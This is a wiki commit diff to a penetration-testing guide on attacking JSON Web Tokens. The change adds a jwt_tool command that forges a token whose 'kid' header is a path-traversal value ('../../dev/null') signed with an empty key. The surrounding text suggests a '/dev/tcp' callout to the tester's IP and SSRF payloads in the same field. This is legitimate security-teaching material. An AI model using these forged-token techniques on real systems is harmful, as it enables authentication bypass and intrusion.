GitBook: [master] one page modified

Author: carlospolop

pentesting-web/hacking-jwt-json-web-tokens.md

@@ -84,6 +84,10 @@ If the claim "kid" is used in the header, check the web directory for that file
 If the claim "kid" is used in the header, check if you can use a different file in the file system. Pick a file you might be able to predict the content of, or maybe try "kid":"/dev/tcp/_yourIP_/_yourPort_ to test connectivity, or even some SSRF payloads...  
 _Use jwt\_tool's -T flag to tamper the JWT and change the value of the kid claim, then choose to keep the original signature_
 
+```bash
+python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
+```
+
 ## Miscellaneous attacks
 
 The following are known weaknesses that should be tested for.